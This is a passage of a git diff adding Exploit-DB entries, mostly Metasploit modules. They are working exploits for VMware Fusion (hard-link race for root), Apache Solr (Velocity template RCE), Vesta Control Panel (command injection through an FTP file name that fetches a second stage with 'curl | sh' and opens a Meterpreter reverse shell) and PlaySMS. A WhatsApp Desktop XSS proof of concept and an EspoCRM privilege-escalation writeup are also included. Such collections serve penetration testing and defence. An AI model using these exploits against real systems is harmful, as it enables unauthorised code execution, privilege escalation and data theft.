+ race = <<~EOF
+ #!/bin/sh
+ while [ "1" = "1" ]; do
+ ln -f '/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}' '#{base_dir}#{usb_service}'
+ ln -f '#{payload_name}' '#{base_dir}#{usb_service}'
+ done
+ EOF
+ racer_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
+ upload_and_chmodx racer_name, race
+ register_file_for_cleanup racer_name
+ register_dirs_for_cleanup root_link_folder
+ # create the hard link
+ print_status "Creating folder (#{link_folder}) and link"
+ cmd_exec "mkdir -p #{link_folder}"
+ cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'"
+
+ # create the launcher to start the racer and keep launching our service to attempt to win
+ launcher = <<~EOF
+ #!/bin/sh
+ #{racer_name} &
+ for i in {1..#{datastore['MAXATTEMPTS']}}
+ do
+ echo "attempt $i";
+ '#{link_folder}#{open_usb_service}'
+ done
+ EOF
+ runner_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
+ upload_and_chmodx runner_name, launcher
+ register_file_for_cleanup runner_name
+
+ print_status "Launching Exploit #{runner_name} (sleeping 15sec)"
+ # XXX: The ; used by cmd_exec will interfere with &, so pad it with :
+ results = cmd_exec "#{runner_name} & :"
+ Rex.sleep 15 # give time for the service to execute our payload
+ vprint_status results
+
+ print_status 'Exploit Finished, killing scripts.'
+ kill_process racer_name
+ kill_process runner_name # in theory should be killed already but just in case
+ kill_process "'#{link_folder}#{open_usb_service}'"
+ # kill_process 'ln' a rogue ln -f may mess us up, but killing them seemed to be unreliable and mark the exploit as failed.
+ # above caused: [-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Unknown error
+ # rm_rf base_dir # this always fails. Leaving it here as a note that when things dont kill well, can't delete the folder
+ end
+
+ def check
+ unless exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}"
+ print_bad "'#{open_usb_service}' binary missing"
+ return CheckCode::Safe
+ end
+ version = get_version
+ if version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.3'))
+ vprint_good "Vmware Fusion #{version} is exploitable"
+ else
+ print_bad "VMware Fusion #{version} is NOT exploitable"
+ return CheckCode::Safe
+ end
+ CheckCode::Appears
+ end
+
+ def exploit
+ # First check the system is vulnerable, or the user wants to run regardless
+ unless check == CheckCode::Appears
+ unless datastore['ForceExploit']
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+ end
+ print_warning 'Target does not appear to be vulnerable'
+ end
+
+ # Check if we're already root
+ if is_root?
+ unless datastore['ForceExploit']
+ fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
+ end
+ end
+
+ # Make sure we can write our payload to the remote system
+ rm_rf content_dir # live dangerously.
+ if directory? content_dir
+ fail_with Filure::BadConfig, "#{content_dir} exists. Unable to delete automatically. Please delete or exploit will fail."
+ end
+ cmd_exec "mkdir -p #{base_dir}"
+ register_dirs_for_cleanup content_dir
+ unless writable? base_dir
+ fail_with Failure::BadConfig, "#{base_dir} is not writable."
+ end
+
+ version = get_version
+ if version == Gem::Version.new('11.5.3')
+ vprint_status 'Using 11.5.3 exploit'
+ exactly_11_5_3
+ elsif version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.2'))
+ vprint_status 'Using pre-11.5.3 exploit'
+ pre_11_5_3
+ end
+ rm_rf content_dir # live dangerously.
+ end
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/48338.rb b/exploits/multiple/remote/48338.rb
new file mode 100755
index 000000000..f2080902b
--- /dev/null
+++ b/exploits/multiple/remote/48338.rb
@@ -0,0 +1,504 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::CmdStager
+ include Msf::Exploit::Powershell
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Apache Solr Remote Code Execution via Velocity Template',
+ 'Description' => %q(
+ This module exploits a vulnerability in Apache Solr <= 8.3.0 which allows remote code execution via a custom
+ Velocity template. Currently, this module only supports Solr basic authentication.
+
+ From the Tenable advisory:
+ An attacker could target a vulnerable Apache Solr instance by first identifying a list
+ of Solr core names. Once the core names have been identified, an attacker can send a specially crafted
+ HTTP POST request to the Config API to toggle the params resource loader value for the Velocity Response
+ Writer in the solrconfig.xml file to true. Enabling this parameter would allow an attacker to use the Velocity
+ template parameter in a specially crafted Solr request, leading to RCE.
+ ),
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 's00py', # Discovery and PoC
+ 'jas502n', # exploit code on Github
+ 'AleWong', # ExploitDB contribution, and exploit code on Github
+ 'Imran E. Dawoodjee <imran[at]threathounds.com>' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'EDB', '47572' ],
+ [ 'CVE', '2019-17558' ],
+ [ 'URL', 'https://www.tenable.com/blog/apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability'],
+ [ 'URL', 'https://www.huaweicloud.com/en-us/notice/2018/20191104170849387.html'],
+ [ 'URL', 'https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133/'],
+ [ 'URL', 'https://github.com/jas502n/solr_rce'],
+ [ 'URL', 'https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template'],
+ ],
+ 'Platform' => ['linux', 'unix', 'win'],
+ 'Targets' =>
+ [
+ [
+ 'Unix (in-memory)',
+ {
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Type' => :unix_memory,
+ 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+ }
+ ],
+ [
+ 'Linux (dropper)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Type' => :linux_dropper,
+ 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+ 'CmdStagerFlavor' => %w[curl wget]
+ }
+ ],
+ [
+ 'x86/x64 Windows PowerShell',
+ {
+ 'Platform' => 'win',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Type' => :windows_psh,
+ 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }
+ }
+ ],
+ [
+ 'x86/x64 Windows CmdStager',
+ {
+ 'Platform' => 'win',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Type' => :windows_cmdstager,
+ 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'vbs' },
+ 'CmdStagerFlavor' => %w[vbs certutil]
+ }
+ ],
+ [
+ 'Windows Exec',
+ {
+ 'Platform' => 'win',
+ 'Arch' => ARCH_CMD,
+ 'Type' => :windows_exec,
+ 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/generic' }
+ }
+ ],
+ ],
+ 'DisclosureDate' => "2019-10-29", # ISO-8601 formatted
+ 'DefaultTarget' => 0,
+ 'Privileged' => false
+ )
+ )
+
+ register_options(
+ [
+ Opt::RPORT(8983),
+ OptString.new('USERNAME', [false, 'Solr username', 'solr']),
+ OptString.new('PASSWORD', [false, 'Solr password', 'SolrRocks']),
+ OptString.new('TARGETURI', [false, 'Path to Solr', '/solr/'])
+ ]
+ )
+ end
+
+ # if we are going to exploit, we only need one core to be exploitable
+ @vuln_core = ""
+ # OS specific stuff
+ @target_platform = ""
+ # if authentication is used
+ @auth_string = ""
+
+ def check_auth
+ # see if authentication is required for the specified Solr instance
+ auth_check = solr_get('uri' => normalize_uri(target_uri.path))
+
+ # successfully connected?
+ unless auth_check
+ print_bad("Connection failed!")
+ return nil
+ end
+
+ # if response code is not 200, then the Solr instance definitely requires authentication
+ unless auth_check.code == 200
+ # if authentication is required and creds are not provided, we cannot reliably check exploitability
+ if datastore['USERNAME'] == "" && datastore['PASSWORD'] == ""
+ print_bad("Credentials not provided, skipping credentialed check...")
+ return nil
+ end
+
+ # otherwise, try the given creds
+ auth_string = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+ attempt_auth = solr_get('uri' => normalize_uri(target_uri.path), 'auth' => auth_string)
+
+ # successfully connected?
+ unless attempt_auth
+ print_bad("Connection failed!")
+ return nil
+ end
+ # if the return code is not 200, then authentication definitely failed
+ unless attempt_auth.code == 200
+ print_bad("Invalid credentials!")
+ return nil
+ end
+
+ store_valid_credential(
+ user: datastore['USERNAME'],
+ private: datastore['PASSWORD'],
+ private_type: :password,
+ proof: attempt_auth.to_s
+ )
+
+ @auth_string = auth_string
+ end
+ # a placeholder return value. Not requiring auth should throw no errors
+ ""
+ end
+
+ # check for vulnerability existence
+ def check
+ auth_res = check_auth
+ unless auth_res
+ return CheckCode::Unknown("Authentication failed!")
+ end
+
+ # send a GET request to get Solr and system details
+ ver = solr_get('uri' => normalize_uri(target_uri.path, '/admin/info/system'), 'auth' => @auth_string)
+
+ # can't connect? that's an automatic failure
+ unless ver
+ return CheckCode::Unknown("Connection failed!")
+ end
+
+ # convert to JSON
+ ver_json = ver.get_json_document
+ # get Solr version
+ solr_version = Gem::Version.new(ver_json['lucene']['solr-spec-version'])
+ print_status("Found Apache Solr #{solr_version}")
+ # get OS version details
+ @target_platform = ver_json['system']['name']
+ target_arch = ver_json['system']['arch']
+ target_osver = ver_json['system']['version']
+ print_status("OS version is #{@target_platform} #{target_arch} #{target_osver}")
+ # uname doesn't show up for Windows, so run a check for that
+ if ver_json['system']['uname']
+ # print uname only when verbose
+ vprint_status("Full uname is '#{ver_json['system']['uname'].strip}'")
+ end
+
+ # the vulnerability is only present in Solr versions <= 8.3.0
+ unless solr_version <= Gem::Version.new('8.3.0')
+ return CheckCode::Safe("Running version of Solr is not vulnerable!")
+ end
+
+ # enumerate cores
+ cores = solr_get('uri' => normalize_uri(target_uri.path, '/admin/cores'), 'auth' => @auth_string)
+
+ # can't connect? that's yet another automatic failure
+ unless cores
+ return CheckCode::Unknown("Could not enumerate cores!")
+ end
+
+ # convert to JSON yet again
+ cores_json = cores.get_json_document
+ # draw up an array of all the cores
+ cores_list = Array.new
+ # get the core names
+ cores_json['status'].keys.each do |core_name|
+ cores_list.push(core_name)
+ end
+
+ # no cores? that means nothing to exploit.
+ if cores_list.empty?
+ return CheckCode::Safe("No cores found, nothing to exploit!")
+ end
+
+ # got cores? tell the operator which cores were found
+ print_status("Found core(s): #{cores_list.join(', ')}")
+ possibly_vulnerable_cores = {}
+
+ cores_list.each do |core|
+ # for each core, attempt to get config
+ core_config = solr_get('uri' => normalize_uri(target_uri.path, core.to_s, 'config'), 'auth' => @auth_string)
+
+ # can't retrieve configuration for that core? go next
+ unless core_config
+ print_error("Could not retrieve configuration for core #{core}!")
+ next
+ end
+
+ # convert to JSON
+ core_config_json = core_config.get_json_document
+ # if the core configuration does not include the Velocity Response Writer, it isn't vulnerable
+ if core_config_json['config']['queryResponseWriter'].keys.include?("velocity")
+ vprint_good("Found Velocity Response Writer in use by core #{core}")
+ if core_config_json['config']['queryResponseWriter']['velocity']['params.resource.loader.enabled'] == "true"
+ vprint_good("params.resource.loader.enabled for core '#{core}' is set to true.")
+ possibly_vulnerable_cores.store(core, true)
+ else
+ # if params.resource.loader.enabled is false, we need to set it to true before exploitation
+ print_warning("params.resource.loader.enabled for core #{core} is set to false.")
+ possibly_vulnerable_cores.store(core, false)
+ end
+ else
+ vprint_error("Velocity Response Writer not found in core #{core}")
+ next
+ end
+ end
+
+ # look at the array of possibly vulnerable cores
+ if possibly_vulnerable_cores.empty?
+ CheckCode::Safe("No cores are vulnerable!")
+ else
+ # if possible, pick a core that already has params.resource.loader.enabled set to true
+ possibly_vulnerable_cores.each do |core|
+ if core[1] == true
+ @vuln_core = core
+ break
+ end
+ end
+ # otherwise, just pick the first one
+ if @vuln_core.to_s == ""
+ @vuln_core = possibly_vulnerable_cores.first
+ end
+ CheckCode::Vulnerable
+ end
+ end
+
+ # the exploit method
+ def exploit
+ unless [CheckCode::Vulnerable].include? check
+ fail_with Failure::NotVulnerable, "Target is most likely not vulnerable!"
+ end
+
+ print_status("Targeting core '#{@vuln_core[0]}'")
+
+ # if params.resource.loader.enabled for that core is false
+ if @vuln_core[1] != true
+ # the new config in JSON format
+ enable_params_resource_loader = {
+ "update-queryresponsewriter": {
+ "startup": "lazy",
+ "name": "velocity",
+ "class": "solr.VelocityResponseWriter",
+ "template.base.dir": "",
+ "solr.resource.loader.enabled": "true",
+ "params.resource.loader.enabled": "true"
+ }
+ }.to_json
+
+ opts_post = {
+ 'method' => 'POST',
+ 'connection' => 'Keep-Alive',
+ 'ctype' => 'application/json;charset=utf-8',
+ 'encode_params' => false,
+ 'uri' => normalize_uri(target_uri.path, @vuln_core[0].to_s, 'config'),
+ 'data' => enable_params_resource_loader
+ }
+
+ unless @auth_string == ""
+ opts_post.store('authorization', @auth_string)
+ end
+
+ print_status("params.resource.loader.enabled is false, setting it to true...")
+ update_config = send_request_cgi(opts_post)
+
+ unless update_config
+ fail_with Failure::Unreachable, "Connection failed!"
+ end
+
+ # if we got anything other than a 200 back, the configuration update failed and the exploit won't work
+ unless update_config.code == 200
+ fail_with Failure::UnexpectedReply, "Unable to update config, exploit failed!"
+ end
+
+ print_good("params.resource.loader.enabled is now set to true!")
+ end
+
+ # windows...
+ if @target_platform.include? "Windows"
+ # if target is wrong, warn and exit before doing anything
+ unless target.name.include? "Windows"
+ fail_with Failure::NoTarget, "Target is found to be Windows, please select the proper target!"
+ end
+
+ case target['Type']
+ # PowerShell...
+ when :windows_psh
+ # need PowerShell for this
+ winenv_path = execute_command("C:\\Windows\\System32\\cmd.exe /c PATH", 'auth_string' => @auth_string, 'core_name' => @vuln_core[0], 'winenv_check' => true)
+ unless winenv_path
+ fail_with Failure::Unreachable, "Connection failed!"
+ end
+
+ # did the command to check for PATH execute?
+ unless winenv_path.code == 200
+ fail_with Failure::UnexpectedReply, "Unexpected reply from target, aborting!"
+ end
+
+ # is PowerShell in PATH?
+ if /powershell/i =~ winenv_path.body.to_s
+ # only interested in the contents of PATH. Everything before it is irrelevant
+ paths = winenv_path.body.split('=')[1]
+ # confirm that PowerShell exists in the PATH by checking each one
+ paths.split(';').each do |path_val|
+ # if PowerShell exists in PATH, then we are good to go
+ unless /powershell/i =~ path_val
+ next
+ end
+
+ print_good("Found Powershell at #{path_val}")
+ # generate PowerShell command, encode with base64, and remove comspec
+ psh_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+ # specify full path to PowerShell
+ psh_cmd.insert(0, path_val)
+ # exploit the thing
+ execute_command(psh_cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
+ break
+ end
+ else
+ fail_with Failure::BadConfig, "PowerShell not found!"
+ end
+ # ... CmdStager ...
+ when :windows_cmdstager
+ print_status("Sending CmdStager payload...")
+ execute_cmdstager(linemax: 7130, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
+ # ... or plain old exec?
+ when :windows_exec
+ cmd = "C:\\Windows\\System32\\cmd.exe /c #{payload.encoded}"
+ execute_command(cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
+ end
+ end
+
+ # ... or nix-based?
+ if @target_platform.include? "Linux"
+ # if target is wrong, warn and exit before doing anything
+ if target.name.include? "Windows"
+ fail_with Failure::NoTarget, "Target is found to be nix-based, please select the proper target!"
+ end
+
+ case target['Type']
+ when :linux_dropper
+ execute_cmdstager('auth_string' => @auth_string, 'core_name' => @vuln_core[0])
+ when :unix_memory
+ cmd = "/bin/bash -c $@|/bin/bash . echo #{payload.encoded}"
+ execute_command(cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
+ end
+ end
+ end
+
+ # some prep work has to be done to work around the limitations of Java's Runtime.exec()
+ def execute_cmdstager_begin(_opts)
+ if @target_platform.include? "Windows"
+ @cmd_list.each do |command|
+ command.insert(0, "C:\\Windows\\System32\\cmd.exe /c ")
+ end
+ else
+ @cmd_list.each do |command|
+ command.insert(0, "/bin/bash -c $@|/bin/bash . echo ")
+ end
+ end
+ end
+
+ # sic 'em, bois!
+ def execute_command(cmd, opts = {})
+ # custom template which enables command execution
+ template = <<~VELOCITY
+ #set($x="")
+ #set($rt=$x.class.forName("java.lang.Runtime"))
+ #set($chr=$x.class.forName("java.lang.Character"))
+ #set($str=$x.class.forName("java.lang.String"))
+ VELOCITY
+
+ # attempts to solve the quoting problem, partially successful
+ if target.name.include?("Unix")
+ template += <<~VELOCITY
+ #set($ex=$rt.getRuntime().exec("#{cmd}"))
+ VELOCITY
+ else
+ template += <<~VELOCITY
+ #set($ex=$rt.getRuntime().exec('#{cmd}'))
+ VELOCITY
+ end
+
+ template += <<~VELOCITY
+ $ex.waitFor()
+ VELOCITY
+
+ # the next 2 lines cause problems with CmdStager, so it's only used when needed
+ # during the check for PowerShell existence, or by specific payloads
+ if opts['winenv_check'] || target['Type'] == :windows_exec || target['Type'] == :unix_memory
+ template += <<~VELOCITY
+ #set($out=$ex.getInputStream())
+ #if($out.available())
+ #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
+ #else
+ #end
+ VELOCITY
+ end
+
+ # execute the exploit...
+ raw_result = solr_get(
+ 'uri' => normalize_uri(target_uri.path, opts['core_name'].to_s, 'select'),
+ 'auth' => opts['auth_string'],
+ 'vars_get' => {
+ 'q' => '1',
+ 'wt' => 'velocity',
+ 'v.template' => 'custom',
+ 'v.template.custom' => template
+ }
+ )
+
+ # Executing PATH always gives a result, so it can return safely
+ if opts['winenv_check']
+ return raw_result
+ end
+
+ # for printing command output
+ unless raw_result.nil?
+ unless raw_result.code == 200
+ fail_with Failure::PayloadFailed, "Payload failed to execute!"
+ end
+
+ # to get pretty output
+ result_inter = raw_result.body.to_s.sub("0\n", ":::").split(":::").last
+ unless result_inter.nil?
+ final_result = result_inter.split("\n").first.strip
+ print_good(final_result)
+ end
+ end
+ end
+
+ # make sending requests easier
+ def solr_get(opts = {})
+ send_request_cgi_opts = {
+ 'method' => 'GET',
+ 'connection' => 'Keep-Alive',
+ 'uri' => opts['uri']
+ }
+
+ # @auth_string defaults to "" if no authentication is necessary
+ # otherwise, authentication is required
+ if opts['auth'] != ""
+ send_request_cgi_opts.store('authorization', opts['auth'])
+ end
+
+ # a bit unrefined, but should suffice in this case
+ if opts['vars_get']
+ send_request_cgi_opts.store('vars_get', opts['vars_get'])
+ end
+
+ send_request_cgi(send_request_cgi_opts)
+ end
+end
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48294.rb b/exploits/multiple/webapps/48294.rb
new file mode 100755
index 000000000..53c997d1a
--- /dev/null
+++ b/exploits/multiple/webapps/48294.rb
@@ -0,0 +1,239 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::Ftp
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::HttpServer
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Vesta Control Panel Authenticated Remote Code Execution",
+ 'Description' => %q{
+ This module exploits command injection vulnerability in v-list-user-backups bash script file.
+ Low privileged authenticated users can execute arbitrary commands under the context of the root user.
+
+ An authenticated attacker with a low privileges can inject a payload in the file name starts with dot.
+ During the user backup process, this file name will be evaluated by the v-user-backup bash scripts. As
+ result of that backup process, when an attacker try to list existing backups injected payload will be
+ executed.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
+ ],
+ 'References' =>
+ [
+ ['URL', 'https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/'],
+ ['CVE', '2020-10808']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'SSL' => true,
+ 'RPORT' => 8083,
+ 'WfsDelay' => 300,
+ 'Payload' => 'python/meterpreter/reverse_tcp'
+ },
+ 'Platform' => ['python'],
+ 'Arch' => ARCH_PYTHON,
+ 'Targets' => [[ 'Automatic', { }]],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Mar 17 2020",
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(8083),
+ OptString.new('USERNAME', [true, 'The username to login as']),
+ OptString.new('PASSWORD', [true, 'The password to login with']),
+ OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
+ ]
+ )
+ deregister_options('FTPUSER', 'FTPPASS')
+ end
+
+ def username
+ datastore['USERNAME']
+ end
+
+ def password
+ datastore['PASSWORD']
+ end
+
+ def login
+ #
+ # This is very simple login process. Nothing important.
+ # We will be using cookie and csrf_token across the module so that we are global variable.
+ #
+ print_status('Retrieving cookie and csrf token values')
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'login', '/'),
+ })
+
+ if res && res.code == 200 && !res.get_cookies.empty?
+ @cookie = res.get_cookies
+ @csrf_token = res.body.scan(/<input type="hidden" name="token" value="(.*)">/).flatten[0] || ''
+ if @csrf_token.empty?
+ fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.')
+ end
+ else
+ fail_with(Failure::Unknown, 'Something went wrong.')
+ end
+ print_good('Cookie and CSRF token values successfully retrieved')
+
+ print_status('Authenticating to HTTP Service with given credentials')
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'login', '/'),
+ 'cookie' => @cookie,
+ 'vars_post' => {
+ 'token' => @csrf_token,
+ 'user' => username,
+ 'password' => password
+ }
+ })
+
+ if res && res.code == 302 && !res.get_cookies.empty?
+ print_good('Successfully authenticated to the HTTP Service')
+ @cookie = res.get_cookies
+ else
+ fail_with(Failure::Unknown, 'Credentials are not valid.')
+ end
+ end
+
+ def is_scheduled_backup_running
+ res = trigger_scheduled_backup
+ #
+ # MORE explaination.
+ #
+ if res && res.code == 302
+ res = trigger_payload
+ if res.body.include?('An existing backup is already running. Please wait for that backup to finish.')
+ return true
+ else
+ print_good('It seems scheduled backup is done ..! Triggerring payload <3')
+ return false
+ end
+ else
+ fail_with(Failure::Unknown, 'Something went wrong. Did you get your session ?')
+ end
+ return false
+ end
+
+ def trigger_payload
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'cookie' => @cookie,
+ 'uri' => normalize_uri(target_uri.path, 'list', 'backup', '/'),
+ })
+ if res && res.code == 200
+ res
+ else
+ fail_with(Failure::Unknown, 'Something went wrong. Maybe session timed out ?')
+ end
+ end
+
+ def trigger_scheduled_backup
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'cookie' => @cookie,
+ 'uri' => normalize_uri(target_uri.path, 'schedule', 'backup', '/'),
+ })
+ if res && res.code == 302 && res.headers['Location'] =~ /\/list\/backup\//
+ res
+ else
+ fail_with(Failure::Unknown, 'Something went wrong.')
+ end
+ end
+
+ def payload_implant
+ #
+ # Our payload will be placed as a file name on FTP service.
+ # Payload lenght can't be more then 255 and SPACE can't be used because of the
+ # bug in the backend software. Due to these limitations, I used web delivery method.
+ #
+ # When the initial payload executed. It will execute very short perl command, which is going to fetch
+ # actual python meterpreter first stager and execute it.
+ #
+ final_payload = "curl -sSL #{@second_stage_url} | sh".to_s.unpack("H*").first
+ p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"
+
+ # Yet another datastore variable overriding.
+ if datastore['SSL']
+ ssl_restore = true
+ datastore['SSL'] = false
+ end
+ port_restore = datastore['RPORT']
+ datastore['RPORT'] = 21
+ datastore['FTPUSER'] = username
+ datastore['FTPPASS'] = password
+
+ #
+ # Connecting to the FTP service with same creds as web ui.
+ # Implanting the very first stage of payload as a empty file.
+ #
+ if (not connect_login)
+ fail_with(Failure::Unknown, 'Unable to authenticate to FTP service')
+ end
+ print_good('Successfully authenticated to the FTP service')
+
+ res = send_cmd_data(['PUT', ".a';$(#{p});'"], "")
+ if res.nil?
+ fail_with(Failure::UnexpectedReply, "Failed to upload the payload to FTP server")
+ end
+ print_good('Successfully uploaded the payload as a file name')
+ disconnect
+
+ # Revert datastore variables.
+ datastore['RPORT'] = port_restore
+ datastore['SSL'] = true if ssl_restore
+ end
+
+ def exploit
+ start_http_server
+ payload_implant
+ login
+ trigger_scheduled_backup
+ print_good('Scheduled backup has ben started. Exploitation may take up to 5 minutes.')
+ while is_scheduled_backup_running == true
+ print_status('It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...')
+ Rex.sleep(30)
+ end
+ stop_service
+ end
+
+ def on_request_uri(cli, request)
+ print_good('First stage is executed ! Sending 2nd stage of the payload')
+ second_stage = "python -c \"#{payload.encoded}\""
+ send_response(cli, second_stage, {'Content-Type'=>'text/html'})
+ end
+
+ def start_http_server
+ #
+ # HttpClient and HttpServer use same SSL variable :(
+ # We don't need a SSL for payload delivery.
+ #
+ if datastore['SSL']
+ ssl_restore = true
+ datastore['SSL'] = false
+ end
+ start_service({'Uri' => {
+ 'Proc' => Proc.new { |cli, req|
+ on_request_uri(cli, req)
+ },
+ 'Path' => resource_uri
+ }})
+ print_status("Second payload download URI is #{get_uri}")
+ # We need that global variable since get_uri keep using SSL from datastore
+ # We have to get the URI before restoring the SSL.
+ @second_stage_url = get_uri
+ datastore['SSL'] = true if ssl_restore
+ end
+end
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48295.txt b/exploits/multiple/webapps/48295.txt
new file mode 100644
index 000000000..7e0e139ae
--- /dev/null
+++ b/exploits/multiple/webapps/48295.txt
@@ -0,0 +1,42 @@
+# Title: WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting
+# Date: 2020-01-21
+# Exploit Author: Gal Weizman
+# Vendor Homepage: https://www.whatsapp.com
+# Software Link: https://web.whatsapp.com/desktop/windows/release/x64/WhatsAppSetup.exe
+# Software Link: https://web.whatsapp.com/desktop/mac/files/WhatsApp.dmg
+# Version: 0.3.9308
+# Tested On: Mac OS, Windows, iPhone
+# CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-18426
+
+// step 1: open WhatsApp Web and enter a conversation (Will only work on WhatsApp Web source code as compiled with version 0.3.9308)
+// step 2: open devtools and search in all files "t=e.id"
+// step 3: after prettifying, set a breakpoint at the line where "t = e.id" can be found
+// step 4: paste "https://example.com" in the text box and hit "Enter"
+// step 5: when the code stops at the breakpoint, paste the following exploit code in the console and hit "Enter"
+
+var payload = `(async function() {
+ alert(navigator.userAgent);
+ (async function() {
+ // read "file:///C:/windows/system32/drivers/etc/hosts" content
+ const r = await fetch(atob('ZmlsZTovLy9DOi93aW5kb3dzL3N5c3RlbTMyL2RyaXZlcnMvZXRjL2hvc3Rz'));
+ const t = await r.text();
+ alert(t);
+ }())
+}())`;
+
+payload = `javascript:"https://example.com";eval(atob("${btoa(payload)}"))`;
+
+e.__x_matchedText = payload;
+
+e.__x_body = `
+ Innocent text
+
+ ${payload}
+
+ More Innocent text
+`;
+
+// step 6: press F8 in order for the execution to continue
+// result: a message should be sent to the victim that once is clicked will execute the payload above
+
+// further information: https://github.com/weizman/CVE-2019-18426
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48376.txt b/exploits/multiple/webapps/48376.txt
new file mode 100644
index 000000000..af82da422
--- /dev/null
+++ b/exploits/multiple/webapps/48376.txt
@@ -0,0 +1,40 @@
+# Exploit Title: EspoCRM 5.8.5 - Privilege Escalation
+# Author: Besim ALTINOK
+# Vendor Homepage: https://www.espocrm.com
+# Software Link: https://www.espocrm.com/downloads/EspoCRM-5.8.5.zip
+# Version: v5.8.5
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+-------------
+
+Details:
+--------------------------------------------
+
+1- When we sent a request to the /api/v1/App/user, we can see user details
+---
+First Request:
+---------------------------
+GET /api/v1/App/user HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 *************************
+Authorization: Basic *************************************
+Espo-Authorization: *************************************
+Espo-Authorization-By-Token: true
+X-Requested-With: XMLHttpRequest
+DNT: 1
+Connection: close
+Cookie: auth-token-secret=cdc7f7*********************377;
+auth-username=user1; auth-token=3a874a********************************48
+----
+
+2- When we decode Basic Authorization and Espo-Authorization and change the
+value with another username (like admin) in the first request, we can see
+other user information and access like BOSS
+----------
+
+3- Some Examples and encode technique
+
+- BASE64:
+First type: dXNlcjE6MQ== (user1:1)
+Second type: user1:MzNmYzYwZDQ1ZDI2YWNhODYxZTZlYjdiMDgwMjk4TkRn (user1:pass)
\ No newline at end of file
diff --git a/exploits/php/remote/48335.rb b/exploits/php/remote/48335.rb
new file mode 100755
index 000000000..a75141519
--- /dev/null
+++ b/exploits/php/remote/48335.rb
@@ -0,0 +1,153 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'PlaySMS index.php Unauthenticated Template Injection Code Execution',
+ 'Description' => %q{
+ This module exploits a preauth Server-Side Template Injection vulnerability that leads to remote code execution
+ in PlaySMS before version 1.4.3. This issue is caused by double processing a server-side template with a custom
+ PHP template system called 'TPL' which is used in the PlaySMS template engine at
+ `src/Playsms/Tpl.php:_compile()`. The vulnerability is triggered when an attacker supplied username with a
+ malicious payload is submitted. This malicious payload is then stored in a TPL template which when rendered a
